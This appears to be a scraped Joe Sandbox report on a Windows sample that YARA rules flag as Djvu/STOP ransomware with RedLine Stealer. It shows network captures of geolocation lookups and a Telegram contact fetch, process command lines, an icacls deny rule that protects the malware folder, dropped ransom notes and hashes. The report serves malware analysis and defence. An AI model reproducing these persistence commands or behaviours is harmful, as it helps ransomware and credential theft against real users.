Jan 9, 2024 15:46:21.731853962 CET	1286	IN	Data Raw: 65 64 20 61 74 20 25 68 73 28 25 64 29 2e 0a 00 43 6c 69 65 6e 74 20 68 6f 6f 6b 20 66 72 65 65 20 66 61 69 6c 75 72 65 2e 0a 00 00 00 00 00 00 54 68 65 20 42 6c 6f 63 6b 20 61 74 20 30 78 25 70 20 77 61 73 20 61 6c 6c 6f 63 61 74 65 64 20 62 79 Data Ascii: ed at %hs(%d).Client hook free failure.The Block at 0x%p was allocated by aligned routines, use _aligned_free()_msize_dbg%hs located at 0x%p is %Iu bytes long.%hs located at 0x%p is %Iu bytes long.Memory allo
Jan 9, 2024 15:46:21.731894970 CET	1286	IN	Data Raw: 65 00 6d 00 43 00 68 00 65 00 63 00 6b 00 70 00 6f 00 69 00 6e 00 74 00 00 00 73 00 74 00 61 00 74 00 65 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 4f 62 6a 65 63 74 20 64 75 6d 70 20 63 6f 6d 70 6c 65 74 65 2e 0a 00 00 63 72 74 20 Data Ascii: emCheckpointstate != NULLObject dump complete.crt block at 0x%p, subtype %x, %Iu bytes long.normal block at 0x%p, %Iu bytes long.client block at 0x%p, subtype %x, %Iu bytes long.{%ld} %hs(%d) : #File

Timestamp	Bytes transferred	Direction	Data
2024-01-09 14:46:02 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-01-09 14:46:02 UTC	887	IN	HTTP/1.1 200 OK Date: Tue, 09 Jan 2024 14:46:02 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j76QyFsGI0YV5SchjNjIGpY5YhQKPNdX%2FJ9s3WXqgSqqMHCoVqH3LkWeSBo0VwJggQ%2FXPlVuHudd2BYritIfsH7XfsJSu7sCClo4XZfMcxz7hpxjgMyqsGs1KCen"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 842d77a7ecaf6fda-IAD alt-svc: h3=":443"; ma=86400
2024-01-09 14:46:02 UTC	433	IN	Data Raw: 31 61 61 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
2024-01-09 14:46:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-01-09 14:46:06 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-01-09 14:46:07 UTC	889	IN	HTTP/1.1 200 OK Date: Tue, 09 Jan 2024 14:46:06 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S%2FqFY37DfQ5eAtCmNeNHK%2BLV6qk5ITSf%2FKWozaC5P0ruC3sB0bpJQLiZ8wD4yeyrBmqEwy7GLuObYuRd1AT3cMyGqOSw3J2fLGG4n24Uk1I1dFfmogBlkVpzkt0L"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 842d77c3f980827e-IAD alt-svc: h3=":443"; ma=86400
2024-01-09 14:46:07 UTC	433	IN	Data Raw: 31 61 61 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
2024-01-09 14:46:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-01-09 14:46:08 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-01-09 14:46:09 UTC	891	IN	HTTP/1.1 200 OK Date: Tue, 09 Jan 2024 14:46:08 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BDJCbJV0lv3aR1g%2BQM4ynB0U15xoOll6ZYJt0%2FwHZLeIia6ANsrgmqgdqheXmqJBS5rrkJSYaqoHPfamrqEuPzmI6cK%2F86cIfjf4CHz85bbzRq50gKpmoBDPneSt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 842d77d078fd2431-IAD alt-svc: h3=":443"; ma=86400
2024-01-09 14:46:09 UTC	433	IN	Data Raw: 31 61 61 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
2024-01-09 14:46:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-01-09 14:46:18 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-01-09 14:46:19 UTC	899	IN	HTTP/1.1 200 OK Date: Tue, 09 Jan 2024 14:46:19 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=h62uW0Ul%2B%2FetwrIwED6w9liCpRx2bWKPq%2FKIO9M4g9tyaNrWdhn315I%2BM14L%2FVdweAav6N1riunO6xQFV%2BzmDf5jIpa9%2FnVPJndrWmN%2FLKnczeylxmtSiR43MZ9i"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 842d780f2d342432-IAD alt-svc: h3=":443"; ma=86400
2024-01-09 14:46:19 UTC	433	IN	Data Raw: 31 61 61 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
2024-01-09 14:46:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-01-09 14:46:25 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-01-09 14:46:26 UTC	897	IN	HTTP/1.1 200 OK Date: Tue, 09 Jan 2024 14:46:26 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Fv5BIHxBZ4IaVdmE%2FEJ4LxJwZ45PWtHdfH3r48SiSLqkxBJVYxl8WKdQb1YEE7XR2hK2W0JvxNbl%2FRxZGArGnNzDsXgWzuMa3k%2BL%2FW56HlC%2B9V%2FinNHFCwecqooG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 842d783c2b101fd6-IAD alt-svc: h3=":443"; ma=86400
2024-01-09 14:46:26 UTC	433	IN	Data Raw: 31 61 61 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
2024-01-09 14:46:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-01-09 14:46:42 UTC	87	OUT	GET /mcfuture HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-01-09 14:46:42 UTC	512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 09 Jan 2024 14:46:42 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12359 Connection: close Set-Cookie: stel_ssid=9cc3ed3c4953e55ca7_12619258344416077456; expires=Wed, 10 Jan 2024 14:46:42 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-01-09 14:46:42 UTC	12359	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 63 66 75 74 75 72 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @mcfuture</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pare

Target ID:	0
Start time:	15:45:56
Start date:	09/01/2024
Path:	C:\Users\user\Desktop\kOVwcHSfrR.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\kOVwcHSfrR.exe
Imagebase:	0x400000
File size:	700'416 bytes
MD5 hash:	D3D46D0339CEB24C85568E75F78846A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.1275320365.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1275320365.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1275132497.000000000266B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report kOVwcHSfrR.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Djvu

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\$WinREAgent\Scratch\_readme.txt

C:\$WinREAgent\_readme.txt

C:\ProgramData\AAEHDAAK

C:\ProgramData\AAKKFHCFIECAAAKEGCFI

C:\ProgramData\BFCFBKKKFHCFHJKFIIEH

C:\ProgramData\DHDHCGHD

C:\ProgramData\FIEHDBGD

C:\ProgramData\GCBKFIEBGCAAFIEBFCAECBFBFB

C:\ProgramData\GHDHDGHJEBGIDGDGIJJKFBAAKK

C:\ProgramData\IJJKKJJD

Windows Analysis Report
kOVwcHSfrR.exe

Target ID:	7
Start time:	15:45:59
Start date:	09/01/2024
Path:	C:\Users\user\Desktop\kOVwcHSfrR.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\kOVwcHSfrR.exe
Imagebase:	0x400000
File size:	700'416 bytes
MD5 hash:	D3D46D0339CEB24C85568E75F78846A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.1293672048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.1293672048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000007.00000002.1293672048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Target ID:	9
Start time:	15:46:01
Start date:	09/01/2024
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls "C:\Users\user\AppData\Local\8429a2bc-b663-4f4e-846e-76e22b7ae313" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Imagebase:	0x870000
File size:	29'696 bytes
MD5 hash:	2E49585E4E08565F52090B144062F97E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	12
Start time:	15:46:04
Start date:	09/01/2024
Path:	C:\Users\user\Desktop\kOVwcHSfrR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\kOVwcHSfrR.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	700'416 bytes
MD5 hash:	D3D46D0339CEB24C85568E75F78846A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000002.1864846210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000002.1864846210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000002.1864846210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Target ID:	13
Start time:	15:46:06
Start date:	09/01/2024
Path:	C:\Users\user\AppData\Local\8429a2bc-b663-4f4e-846e-76e22b7ae313\kOVwcHSfrR.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\8429a2bc-b663-4f4e-846e-76e22b7ae313\kOVwcHSfrR.exe --Task
Imagebase:	0x400000
File size:	700'416 bytes
MD5 hash:	D3D46D0339CEB24C85568E75F78846A7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000D.00000002.2496998332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000D.00000002.2496998332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000D.00000002.2496998332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Target ID:	17
Start time:	15:46:16
Start date:	09/01/2024
Path:	C:\Users\user\AppData\Local\8429a2bc-b663-4f4e-846e-76e22b7ae313\kOVwcHSfrR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\8429a2bc-b663-4f4e-846e-76e22b7ae313\kOVwcHSfrR.exe" --AutoStart
Imagebase:	0x400000
File size:	700'416 bytes
MD5 hash:	D3D46D0339CEB24C85568E75F78846A7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000002.1461036897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000002.1461036897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000002.1461036897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Target ID:	18
Start time:	15:46:18
Start date:	09/01/2024
Path:	C:\Users\user\AppData\Local\2df19a2c-b539-4ffa-a72b-f2a685ef7f31\build2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\2df19a2c-b539-4ffa-a72b-f2a685ef7f31\build2.exe"
Imagebase:	0x400000
File size:	252'928 bytes
MD5 hash:	1F7EFAC73D987DAE200E36922267D8C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000012.00000002.1683207825.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Target ID:	20
Start time:	15:46:23
Start date:	09/01/2024
Path:	C:\Users\user\AppData\Local\8429a2bc-b663-4f4e-846e-76e22b7ae313\kOVwcHSfrR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\8429a2bc-b663-4f4e-846e-76e22b7ae313\kOVwcHSfrR.exe" --AutoStart
Imagebase:	0x400000
File size:	700'416 bytes
MD5 hash:	D3D46D0339CEB24C85568E75F78846A7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000014.00000002.1531079174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000014.00000002.1531079174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000014.00000002.1531079174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Target ID:	21
Start time:	15:46:40
Start date:	09/01/2024
Path:	C:\Users\user\AppData\Local\2df19a2c-b539-4ffa-a72b-f2a685ef7f31\build2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\2df19a2c-b539-4ffa-a72b-f2a685ef7f31\build2.exe"
Imagebase:	0x400000
File size:	252'928 bytes
MD5 hash:	1F7EFAC73D987DAE200E36922267D8C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	97.4%
Signature Coverage:	43.6%
Total number of Nodes:	39
Total number of Limit Nodes:	7

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	36%
Total number of Nodes:	836
Total number of Limit Nodes:	84